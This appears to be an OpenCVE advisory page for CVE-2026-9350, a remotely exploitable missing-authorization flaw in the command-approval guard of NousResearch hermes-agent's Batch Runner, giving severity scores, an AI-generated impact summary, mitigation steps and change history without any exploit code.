Description
A vulnerability was identified in NousResearch hermes-agent up to 2026.4.16. This affects the function check_all_command_guards of the file tools/approval.py of the component Batch Runner. Such manipulation leads to missing authorization. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2026-05-24
Score: 6.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability arises in the check_all_command_guards function of the Batch Runner's tools/approval.py module. By manipulating the input to this function, an attacker can bypass the required authorization checks, allowing execution of privileged commands or actions without proper permission. This results in unauthorized privileged operations, representing a breach of confidentiality and integrity and is classified under CWE-862 and CWE-863.

Affected Systems

Versions of NousResearch hermes-agent up to and including 2026.4.16 are affected. The flaw specifically targets the Batch Runner component of the Hermes-Agent product suite.

Risk and Exploitability

With a CVSS score of 6.9 the vulnerability is considered moderate in severity. The EPSS score is not available, and the vulnerability is not listed in the CISA KEV catalog. Exploitation is possible remotely, and the exploit code is publicly available, indicating a realistic threat surface. Attackers with remote network access to the Hermes-Agent service could exploit the lack of proper authorization to gain elevated privileges or bypass controls.

Generated by OpenCVE AI on May 24, 2026 at 04:21 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to a Hermes-Agent version newer than 2026.4.16 once a vendor patch is available.
  • Restrict network exposure of the Batch Runner component so that only trusted hosts can communicate with it.
  • Enable detailed logging for the Batch Runner and actively monitor logs for anomalous command executions or unauthorized access attempts.
  • Apply the principle of least privilege to all user accounts interacting with Hermes-Agent to limit potential impact if the bypass is successful.

Generated by OpenCVE AI on May 24, 2026 at 04:21 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Sun, 24 May 2026 03:30:00 +0000

Type Values Removed Values Added
Description A vulnerability was identified in NousResearch hermes-agent up to 2026.4.16. This affects the function check_all_command_guards of the file tools/approval.py of the component Batch Runner. Such manipulation leads to missing authorization. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
Title NousResearch hermes-agent Batch Runner approval.py check_all_command_guards authorization
First Time appeared Nousresearch
Nousresearch hermes-agent
Weaknesses CWE-862
CWE-863
CPEs cpe:2.3:a:nousresearch:hermes-agent:*:*:*:*:*:*:*:*
Vendors & Products Nousresearch
Nousresearch hermes-agent
References
Metrics cvssV2_0

{'score': 7.5, 'vector': 'AV:N/AC:L/Au:N/C:P/I:P/A:P/E:POC/RL:ND/RC:UR'}

cvssV3_0

{'score': 7.3, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R'}

cvssV3_1

{'score': 7.3, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R'}

cvssV4_0

{'score': 6.9, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P'}

Subscriptions

Nousresearch Hermes-agent
cve-icon MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-05-24T02:45:10.330Z

Reserved: 2026-05-23T09:19:30.069Z

Link: CVE-2026-9350

cve-icon Vulnrichment

No data.

cve-icon NVD

No data.

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-24T05:15:35Z

Weaknesses